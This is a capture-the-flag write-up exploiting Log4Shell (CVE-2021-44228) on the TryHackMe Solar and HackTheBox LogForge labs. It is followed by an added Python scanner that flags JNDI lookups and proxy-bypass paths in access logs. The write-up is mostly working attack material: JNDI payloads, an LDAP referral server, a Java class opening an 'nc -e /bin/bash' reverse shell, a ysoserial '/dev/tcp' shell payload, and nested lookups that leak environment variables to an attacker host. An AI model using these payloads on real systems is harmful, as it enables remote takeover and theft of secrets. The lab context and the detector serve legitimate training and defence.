Exploiting Log4Shell (CVE-2021-44228): solar (THM) and logforge (HTB)

THM- solar

https://tryhackme.com/room/solar

TASK 2 (Reconnaissance)

nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out 10.10.171.12
autorecon -vvv 10.10.171.12

TASK 3 (Discovery)

Browsing to the web server gives a lot of information about the tool/software that is running.

TASK 4 and 5 (PoC, Exploitation)

If we send the Log4Shell PoC payload to the path (/admin/cores) that we saw in the log file, we get a connection back to our listener.

${jndi:ldap://ATTACKERCONTROLLEDHOST}
nc -lnvp 9999
curl 'http://10.10.114.97:8983/solr/admin/cores?foo=${jndi:ldap://10.17.7.105:9999}'
curl 'http://10.10.114.97:8983/solr/admin/cores?foo=${jndi:rmi://10.17.7.105:9999/lollz}'
update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_311/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_311/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_311/bin/javaws" 1
update-alternatives --set java /usr/lib/jvm/jdk1.8.0_311/bin/java
update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_311/bin/javac
update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_311/bin/javaws
java -version
apt install maven
# This will compile the java app @ https://github.com/mbechler/marshalsec
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.17.7.105:8000/#Exploit"
public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.17.7.105 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
javac Exploit.java -source 8 -target 8
curl 'http://10.10.156.44:8983/solr/admin/cores?foo=${jndi:ldap://10.17.7.105:1389/Exploit}'

HTB- logforge

Apache reverse proxy bypass:

http://10.10.11.138/portal/..;/manager/html/expire?path=/
or
http://10.10.11.138/;name=lollz/manager/html/upload
java -jar ysoserial-modified.jar CommonsCollections5 bash 'sh -i >& /dev/tcp/10.10.14.40/53 0>&1' > /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.40:1389 -P /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser
ldap://10.10.14.40:1389/a8ziqy
${jndi:ldap://10.10.14.40:1389/a8ziqy}
${jndi:ldap://<IP>:<PORT>/${env:<var_name>}}
${jndi:ldap://10.10.14.40:1389/${env:ftp_user}}
${jndi:ldap://10.10.14.40:1389/${java:version}}
${jndi:ldap://10.10.14.40:1389/${java:os}}
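From the defender's side, the request shapes used in both labs above (the Solr /admin/cores lookup, the nested ${env:...}/${java:...} lookups, and the "..;/" segment used against the reverse proxy) are all visible in a plain access log. The scanner below is an added example, not part of the writeup or either lab; the log lines are constructed, and it also percent-decodes twice so URL-encoded variants of the same payloads are caught.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the lab machines), shaped like the
# requests in this writeup: the Solr /admin/cores lookup, a URL-encoded nested
# ${env:...} lookup, and the "..;/" segment used to slip past the reverse proxy.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /solr/admin/cores?foo=${jndi:ldap://198.51.100.9:1389/Exploit} HTTP/1.1" 200 512
10.0.0.5 - - [10/Dec/2021:12:00:02 +0000] "GET /solr/admin/cores?foo=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2F%24%7Benv%3Aftp_user%7D%7D HTTP/1.1" 200 512
10.0.0.5 - - [10/Dec/2021:12:00:03 +0000] "GET /portal/..;/manager/html HTTP/1.1" 200 2048
10.0.0.6 - - [10/Dec/2021:12:00:04 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|HEAD|OPTIONS) (\S+)')
# ${jndi:<scheme>:...} with optional whitespace; the scheme is captured for triage.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
# Inner lookups such as ${env:ftp_user} or ${java:version}: Log4j resolves these
# first, so their values end up in the path sent to the attacker's LDAP server.
NESTED_RE = re.compile(r"\$\{\s*(env|sys|java|date|lower|upper|main)\s*:\s*([^}]*)\}", re.IGNORECASE)
# A path segment carrying a ';' parameter ("/..;/", "/;name=x/"): Tomcat strips it
# during normalisation, a front proxy may not. ";jsessionid=" also matches, so
# triage those separately rather than blocking on this rule alone.
SEGMENT_PARAM_RE = re.compile(r"/[^/?]*;[^/?]*/")


def scan_log(text):
    """Return one finding per suspicious request: (line no, kind, detail, nested lookups)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        target = m.group(1) if m else line
        # Two rounds of percent-decoding catch the double-encoded variants.
        decoded = unquote(unquote(target))
        jndi = JNDI_RE.search(decoded)
        if jndi:
            nested = ["${%s:%s}" % (k.lower(), v) for k, v in NESTED_RE.findall(decoded)]
            findings.append((lineno, "jndi-lookup", jndi.group(1).lower(), nested))
        seg = SEGMENT_PARAM_RE.search(decoded)
        if seg:
            findings.append((lineno, "path-param-segment", seg.group(0), []))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %d: %s %s %s" % f)
```

The nested-lookup list is the part worth keeping in an alert: it tells you which environment variables or JVM properties were being pulled into the callback.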

n00🔑

Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/